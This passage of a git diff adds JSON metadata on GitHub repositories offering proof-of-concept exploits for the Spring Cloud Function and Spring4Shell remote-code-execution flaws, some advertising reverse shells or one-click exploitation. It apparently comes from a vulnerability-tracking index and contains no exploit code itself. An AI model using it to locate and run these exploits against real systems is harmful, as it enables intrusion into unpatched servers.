[], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 480323110, + "name": "CVE-2022-22963", + "full_name": "G01d3nW01f\/CVE-2022-22963", + "owner": { + "login": "G01d3nW01f", + "id": 75846902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4", + "html_url": "https:\/\/github.com\/G01d3nW01f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2022-22963", + "description": null, + "fork": false, + "created_at": "2022-04-11T10:01:25Z", + "updated_at": "2023-03-26T10:38:37Z", + "pushed_at": "2023-03-12T06:19:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 481573619, + "name": "spring-cloud-function-rce", + "full_name": "k3rwin\/spring-cloud-function-rce", + "owner": { + "login": "k3rwin", + "id": 59213152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59213152?v=4", + "html_url": "https:\/\/github.com\/k3rwin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3rwin\/spring-cloud-function-rce", + "description": "Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963)", + "fork": false, + "created_at": "2022-04-14T11:10:50Z", + "updated_at": "2024-03-07T07:50:07Z", + "pushed_at": "2022-04-22T05:13:32Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 531444886, + "name": "CVE-2022-22963", + "full_name": "75ACOL\/CVE-2022-22963", + "owner": { + "login": "75ACOL", + "id": 57381895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57381895?v=4", + "html_url": "https:\/\/github.com\/75ACOL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/75ACOL\/CVE-2022-22963", + "description": null, + "fork": false, + "created_at": "2022-09-01T09:13:59Z", + "updated_at": "2022-09-01T09:13:59Z", + "pushed_at": "2022-09-01T09:14:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 570601413, + "name": "CVE-2022-22963", + "full_name": "dr6817\/CVE-2022-22963", + "owner": { + "login": "dr6817", + "id": 10582363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10582363?v=4", + "html_url": "https:\/\/github.com\/dr6817", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dr6817\/CVE-2022-22963", + "description": null, + "fork": false, + "created_at": "2022-11-25T15:31:19Z", + "updated_at": "2023-11-22T10:03:46Z", + "pushed_at": "2022-11-25T15:42:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589347123, + "name": "CVE-2022-22963-POC", + "full_name": "iliass-dahman\/CVE-2022-22963-POC", + "owner": { + "login": "iliass-dahman", + "id": 40769568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40769568?v=4", + "html_url": "https:\/\/github.com\/iliass-dahman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iliass-dahman\/CVE-2022-22963-POC", + "description": null, + "fork": false, + "created_at": "2023-01-15T21:39:20Z", + "updated_at": "2023-03-24T18:08:12Z", + "pushed_at": "2023-01-22T22:39:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 610851382, + "name": "CVE-2022-22963", + "full_name": "charis3306\/CVE-2022-22963", + "owner": { + "login": "charis3306", + "id": 84823804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84823804?v=4", + "html_url": "https:\/\/github.com\/charis3306", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charis3306\/CVE-2022-22963", + "description": "spring cloud function 一键利用工具! by charis 博客https:\/\/charis3306.top\/", + "fork": false, + "created_at": "2023-03-07T15:57:29Z", + "updated_at": "2024-09-24T03:12:53Z", + "pushed_at": "2023-06-04T08:02:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 613387933, + "name": "CVE-2022-22963-PoC", + "full_name": "lemmyz4n3771\/CVE-2022-22963-PoC", + "owner": { + "login": "lemmyz4n3771", + "id": 116111418, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116111418?v=4", + "html_url": "https:\/\/github.com\/lemmyz4n3771", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lemmyz4n3771\/CVE-2022-22963-PoC", + "description": "CVE-2022-22963 RCE PoC in python", + "fork": false, + "created_at": "2023-03-13T13:28:55Z", + "updated_at": "2023-07-07T22:25:02Z", + "pushed_at": "2023-03-14T15:23:12Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615687765, + "name": "CVE-2022-22963_Reverse-Shell-Exploit", + "full_name": "J0ey17\/CVE-2022-22963_Reverse-Shell-Exploit", + "owner": { + "login": "J0ey17", + "id": 72118225, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72118225?v=4", + "html_url": "https:\/\/github.com\/J0ey17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/J0ey17\/CVE-2022-22963_Reverse-Shell-Exploit", + "description": "CVE-2022-22963 is a vulnerability in the Spring Cloud Function Framework for Java that allows remote code execution. This python script will verify if the vulnerability exists, and if it does, will give you a reverse shell.", + "fork": false, + "created_at": "2023-03-18T11:43:00Z", + "updated_at": "2024-08-12T20:30:19Z", + "pushed_at": "2023-03-18T11:47:55Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616814586, + "name": "CVE-2022-22963", + "full_name": "Mustafa1986\/CVE-2022-22963", + "owner": { + "login": "Mustafa1986", + "id": 27927358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4", + "html_url": "https:\/\/github.com\/Mustafa1986", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mustafa1986\/CVE-2022-22963", + "description": null, + "fork": false, + "created_at": "2023-03-21T06:14:35Z", + "updated_at": "2023-03-21T06:16:01Z", + "pushed_at": "2023-03-21T06:15:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 625969417, + "name": "CVE-2022-22963-Exploit", + "full_name": "SourM1lk\/CVE-2022-22963-Exploit", + "owner": { + "login": "SourM1lk", + "id": 116470756, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116470756?v=4", + "html_url": "https:\/\/github.com\/SourM1lk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SourM1lk\/CVE-2022-22963-Exploit", + "description": "Rust-based exploit for the CVE-2022-22963 vulnerability", + "fork": false, + "created_at": "2023-04-10T14:12:58Z", + "updated_at": "2023-05-31T19:48:01Z", + "pushed_at": "2023-04-11T13:46:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 629041592, + "name": "Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE", + "full_name": "randallbanner\/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE", + "owner": { + "login": "randallbanner", + "id": 99814847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99814847?v=4", + "html_url": "https:\/\/github.com\/randallbanner", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/randallbanner\/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE", + "description": null, + "fork": false, + "created_at": "2023-04-17T13:54:06Z", + "updated_at": "2023-12-10T00:17:36Z", + "pushed_at": "2023-04-17T14:01:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 635879677, + "name": "CVE-2022-22963", + "full_name": "gunzf0x\/CVE-2022-22963", + "owner": { + "login": "gunzf0x", + "id": 31874167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31874167?v=4", + "html_url": "https:\/\/github.com\/gunzf0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gunzf0x\/CVE-2022-22963", + "description": "Binaries for CVE-2022-22963", + "fork": false, + "created_at": "2023-05-03T16:45:06Z", + "updated_at": "2023-05-03T17:19:31Z", + "pushed_at": "2023-05-04T23:24:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22963", + "exploits", + "spring-cloud", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 645500414, + "name": "RCE-in-Spring-Cloud-CVE-2022-22963", + "full_name": "nikn0laty\/RCE-in-Spring-Cloud-CVE-2022-22963", + "owner": { + "login": "nikn0laty", + "id": 96344826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96344826?v=4", + "html_url": "https:\/\/github.com\/nikn0laty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nikn0laty\/RCE-in-Spring-Cloud-CVE-2022-22963", + "description": "Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function", + "fork": false, + "created_at": "2023-05-25T19:50:38Z", + "updated_at": "2023-05-25T19:54:23Z", + "pushed_at": "2023-05-26T21:50:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711317604, + "name": "CVE-2022-22963-Poc-Bearcules", + "full_name": "BearClaw96\/CVE-2022-22963-Poc-Bearcules", + "owner": { + "login": "BearClaw96", + "id": 118552753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118552753?v=4", + "html_url": "https:\/\/github.com\/BearClaw96", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BearClaw96\/CVE-2022-22963-Poc-Bearcules", + "description": "This is a POC for CVE-2022-22963 ", + "fork": false, + "created_at": "2023-10-28T21:42:38Z", + "updated_at": "2023-10-28T21:55:49Z", + "pushed_at": "2023-10-28T21:56:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 797556032, + "name": "CVE-2022-22963", + "full_name": "jrbH4CK\/CVE-2022-22963", + "owner": { + "login": "jrbH4CK", + "id": 163496398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163496398?v=4", + "html_url": "https:\/\/github.com\/jrbH4CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jrbH4CK\/CVE-2022-22963", + "description": null, + "fork": false, + "created_at": "2024-05-08T04:25:29Z", + "updated_at": "2024-07-30T23:22:39Z", + "pushed_at": "2024-07-30T23:22:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22965.json b/2022/CVE-2022-22965.json new file mode 100644 index 0000000000..cc99c64939 --- /dev/null +++ b/2022/CVE-2022-22965.json @@ -0,0 +1,2484 @@ +[ + { + "id": 475776212, + "name": "Spring4Shell-POC", + "full_name": "BobTheShoplifter\/Spring4Shell-POC", + "owner": { + "login": "BobTheShoplifter", + "id": 22559547, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22559547?v=4", + "html_url": "https:\/\/github.com\/BobTheShoplifter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BobTheShoplifter\/Spring4Shell-POC", + "description": "Spring4Shell Proof Of Concept\/And vulnerable application CVE-2022-22965", + "fork": false, + "created_at": "2022-03-30T07:54:45Z", + "updated_at": "2024-11-27T06:47:37Z", + "pushed_at": "2022-11-09T15:46:06Z", + "stargazers_count": 361, + "watchers_count": 361, + "has_discussions": false, + "forks_count": 104, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22965", + "java", + "rce", + "spring", + "spring-core-rce", + "spring4shell", + "springshell", + "tomcat" + ], + "visibility": "public", + "forks": 104, + "watchers": 361, + "score": 0, + "subscribers_count": 18 + }, + { + "id": 475918792, + "name": "spring-core-rce", + "full_name": "Mr-xn\/spring-core-rce", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/spring-core-rce", + "description": "CVE-2022-22965 : about spring core rce", + "fork": false, + "created_at": "2022-03-30T14:35:00Z", + "updated_at": "2024-09-14T07:13:20Z", + "pushed_at": "2022-04-01T15:34:03Z", + "stargazers_count": 51, + "watchers_count": 51, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22965", + "spring", + "spring-mvc", + "spring-security" + ], + "visibility": "public", + "forks": 18, + "watchers": 51, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 475975991, + "name": "SpringShell", + "full_name": "TheGejr\/SpringShell", + "owner": { + "login": "TheGejr", + "id": 7090568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7090568?v=4", + "html_url": "https:\/\/github.com\/TheGejr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheGejr\/SpringShell", + "description": "Spring4Shell - Spring Core RCE - CVE-2022-22965", + "fork": false, + "created_at": "2022-03-30T17:05:46Z", + "updated_at": "2024-11-27T10:13:20Z", + "pushed_at": "2022-04-04T14:09:11Z", + "stargazers_count": 126, + "watchers_count": 126, + "has_discussions": false, + "forks_count": 85, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-22965", + "rce", + "spring", + "spring-core-rce", + "spring-security", + "spring4shell", + "springcore", + "springshell", + "working-example" + ], + "visibility": "public", + "forks": 85, + "watchers": 126, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 476094464, + "name": "Spring4Shell-POC", + "full_name": "reznok\/Spring4Shell-POC", + "owner": { + "login": "reznok", + "id": 23696484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23696484?v=4", + "html_url": "https:\/\/github.com\/reznok", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reznok\/Spring4Shell-POC", + "description": "Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit", + "fork": false, + "created_at": "2022-03-31T00:24:28Z", + "updated_at": "2024-10-22T07:08:32Z", + "pushed_at": "2022-08-04T18:26:18Z", + "stargazers_count": 312, + "watchers_count": 312, + "has_discussions": false, + "forks_count": 235, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 235, + "watchers": 312, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 476115414, + "name": "CVE-2022-22965-GUItools", + "full_name": "light-Life\/CVE-2022-22965-GUItools", + "owner": { + "login": "light-Life", + "id": 53685855, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53685855?v=4", + "html_url": "https:\/\/github.com\/light-Life", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/light-Life\/CVE-2022-22965-GUItools", + "description": "spring-core单个图形化利用工具,CVE-2022-22965及修复方案已出", + "fork": false, + "created_at": "2022-03-31T02:00:18Z", + "updated_at": "2024-09-05T01:33:20Z", + "pushed_at": "2022-04-02T15:29:31Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476210489, + "name": "springshell-rce-poc", + "full_name": "DDuarte\/springshell-rce-poc", + "owner": { + "login": "DDuarte", + "id": 530940, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/530940?v=4", + "html_url": "https:\/\/github.com\/DDuarte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DDuarte\/springshell-rce-poc", + "description": "CVE-2022-22965 - CVE-2010-1622 redux", + "fork": false, + "created_at": "2022-03-31T08:06:46Z", + "updated_at": "2024-08-12T20:22:01Z", + "pushed_at": "2023-04-18T14:15:42Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2010-1622", + "cve-2022-22965", + "spring4shell", + "springshell" + ], + "visibility": "public", + "forks": 12, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476300392, + "name": "spring-core-rce", + "full_name": "k3rwin\/spring-core-rce", + "owner": { + "login": "k3rwin", + "id": 59213152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59213152?v=4", + "html_url": "https:\/\/github.com\/k3rwin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3rwin\/spring-core-rce", + "description": "spring框架RCE漏洞 CVE-2022-22965", + "fork": false, + "created_at": "2022-03-31T12:41:29Z", + "updated_at": "2024-08-27T06:57:53Z", + "pushed_at": "2022-04-22T07:37:16Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 29, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476308143, + "name": "spring-core-rce", + "full_name": "liangyueliangyue\/spring-core-rce", + "owner": { + "login": "liangyueliangyue", + "id": 73013511, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73013511?v=4", + "html_url": "https:\/\/github.com\/liangyueliangyue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/liangyueliangyue\/spring-core-rce", + "description": "springFramework_CVE-2022-22965_RCE简单利用", + "fork": false, + "created_at": "2022-03-31T13:02:18Z", + "updated_at": "2024-08-12T20:22:02Z", + "pushed_at": "2022-04-07T10:28:11Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476315234, + "name": "CVE-2022-22965-PoC", + "full_name": "Kirill89\/CVE-2022-22965-PoC", + "owner": { + "login": "Kirill89", + "id": 2003936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2003936?v=4", + "html_url": "https:\/\/github.com\/Kirill89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kirill89\/CVE-2022-22965-PoC", + "description": null, + "fork": false, + "created_at": "2022-03-31T13:21:49Z", + "updated_at": "2024-10-23T05:32:08Z", + "pushed_at": "2022-04-05T21:30:19Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 28, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476355522, + "name": "spring4shell-exploit-poc", + "full_name": "FourCoreLabs\/spring4shell-exploit-poc", + "owner": { + "login": "FourCoreLabs", + "id": 75159435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75159435?v=4", + "html_url": "https:\/\/github.com\/FourCoreLabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FourCoreLabs\/spring4shell-exploit-poc", + "description": "Exploit a vulnerable Spring application with the Spring4Shell (CVE-2022-22965) Vulnerability.", + "fork": false, + "created_at": "2022-03-31T15:01:12Z", + "updated_at": "2024-08-12T20:22:02Z", + "pushed_at": "2022-04-06T15:00:14Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 43, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476372267, + "name": "CVE-2022-22965_PoC", + "full_name": "alt3kx\/CVE-2022-22965_PoC", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2022-22965_PoC", + "description": "Spring Framework RCE (Quick pentest notes)", + "fork": false, + "created_at": "2022-03-31T15:43:06Z", + "updated_at": "2023-12-01T02:21:55Z", + "pushed_at": "2022-04-07T19:12:38Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476384052, + "name": "CVE-2022-22965", + "full_name": "GuayoyoCyber\/CVE-2022-22965", + "owner": { + "login": "GuayoyoCyber", + "id": 17362318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17362318?v=4", + "html_url": "https:\/\/github.com\/GuayoyoCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GuayoyoCyber\/CVE-2022-22965", + "description": "Vulnerabilidad RCE en Spring Framework vía Data Binding on JDK 9+ (CVE-2022-22965 aka \"Spring4Shell\")", + "fork": false, + "created_at": "2022-03-31T16:14:36Z", + "updated_at": "2022-04-24T08:10:05Z", + "pushed_at": "2022-04-19T15:05:47Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-22965", + "spring-framework", + "spring4shell", + "vulnerability", + "wazuh" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476399976, + "name": "Safer_PoC_CVE-2022-22965", + "full_name": "colincowie\/Safer_PoC_CVE-2022-22965", + "owner": { + "login": "colincowie", + "id": 14298667, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14298667?v=4", + "html_url": "https:\/\/github.com\/colincowie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/colincowie\/Safer_PoC_CVE-2022-22965", + "description": "A Safer PoC for CVE-2022-22965 (Spring4Shell)", + "fork": false, + "created_at": "2022-03-31T16:58:56Z", + "updated_at": "2024-08-12T20:22:02Z", + "pushed_at": "2022-05-27T12:56:40Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 44, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476424726, + "name": "spring4shell-CVE-2022-22965", + "full_name": "rwincey\/spring4shell-CVE-2022-22965", + "owner": { + "login": "rwincey", + "id": 5438659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5438659?v=4", + "html_url": "https:\/\/github.com\/rwincey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rwincey\/spring4shell-CVE-2022-22965", + "description": null, + "fork": false, + "created_at": "2022-03-31T18:09:58Z", + "updated_at": "2022-04-04T14:13:42Z", + "pushed_at": "2022-04-01T13:59:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 476446818, + "name": "CVE-2022-22965-poc", + "full_name": "viniciuspereiras\/CVE-2022-22965-poc", + "owner": { + "login": "viniciuspereiras", + "id": 69733777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69733777?v=4", + "html_url": "https:\/\/github.com\/viniciuspereiras", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viniciuspereiras\/CVE-2022-22965-poc", + "description": "CVE-2022-22965 poc including reverse-shell support", + "fork": false, + "created_at": "2022-03-31T19:19:52Z", + "updated_at": "2024-08-12T20:22:02Z", + "pushed_at": "2023-11-29T20:11:53Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476522206, + "name": "springhound", + "full_name": "mebibite\/springhound", + "owner": { + "login": "mebibite", + "id": 54244269, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54244269?v=4", + "html_url": "https:\/\/github.com\/mebibite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mebibite\/springhound", + "description": "Created after the disclosure of CVE-2022-22965 and CVE-2022-22963. Bash script that detects Spring Framework occurrences in your projects and systems, allowing you to get insight on versions used. Unpacks JARs and analyses their Manifest files.", + "fork": false, + "created_at": "2022-04-01T00:34:29Z", + "updated_at": "2024-04-22T19:41:50Z", + "pushed_at": "2022-04-01T00:42:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476546576, + "name": "CVE-2022-22965", + "full_name": "likewhite\/CVE-2022-22965", + "owner": { + "login": "likewhite", + "id": 68556929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68556929?v=4", + "html_url": "https:\/\/github.com\/likewhite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likewhite\/CVE-2022-22965", + "description": "CVE-2022-22965 EXP", + "fork": false, + "created_at": "2022-04-01T02:25:46Z", + "updated_at": "2022-04-01T07:48:56Z", + "pushed_at": "2023-01-31T08:54:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476577644, + "name": "SpringFramework_CVE-2022-22965_RCE", + "full_name": "Axx8\/SpringFramework_CVE-2022-22965_RCE", + "owner": { + "login": "Axx8", + "id": 34683107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34683107?v=4", + "html_url": "https:\/\/github.com\/Axx8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Axx8\/SpringFramework_CVE-2022-22965_RCE", + "description": "SpringFramework 远程代码执行漏洞CVE-2022-22965", + "fork": false, + "created_at": "2022-04-01T04:51:44Z", + "updated_at": "2024-08-12T20:22:03Z", + "pushed_at": "2022-04-01T12:08:45Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 75, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476597168, + "name": "spring-boot-cve-2022-22965", + "full_name": "snicoll-scratches\/spring-boot-cve-2022-22965", + "owner": { + "login": "snicoll-scratches", + "id": 13015101, + "avatar_url": 